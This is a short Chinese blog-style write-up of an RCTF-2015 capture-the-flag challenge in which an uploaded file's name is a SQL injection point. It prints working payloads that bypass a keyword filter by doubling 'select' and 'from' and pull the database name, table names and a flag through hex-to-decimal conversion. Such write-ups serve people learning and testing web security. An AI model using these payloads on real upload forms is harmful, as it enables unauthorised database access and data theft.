這道題的話,看了一下是RCTF-2015的原題。。。。可是這也太難了吧QAQ,文件名作為注入點可也是太秀了,害的我一直以為是文件上傳QAQ,並且這道題的坑還不少,就是注入時的輸出只能為10進制。。。。。這也就是說還需要你進行一下進制轉換。。。
還有這里面將select和from過濾了一次。。。你還需要雙寫,,,哎。心累
一遍遍的fuzz的話,不知道要弄到什么時候。幸虧我是看着題解做的2333:)
不說了,因為自己啥也不會(看的題解QAQ),所以直接將payload發一下(其實不難,主要是你能夠發現問題)
爆數據庫名: '+(selselectect CONV(substr(hex(dAtaBase()),1,12),16,10))+'.jpg
將filename里面的內容替換掉,然后發送,刷新一下頁面,就會有回顯了。
先把10進制變為16進制在轉為字符串,還有因為回顯位數有限,所以你還需要多切割幾次QAQ
爆表名:'+(selselectect CONV(substr(hex(selselectect table_name frfromom information_schema.tables where table_schema='web_upload' limit 1,1)),1,10),16,10))+'.jpg
爆列名:把上面的改一下就行了
爆flag:'+(selselectect+CONV(substr(hex((selselectect i_am_flag frfromom hello_flag_is_here )),25,12),16,10))+'.jpg
自己還是太菜了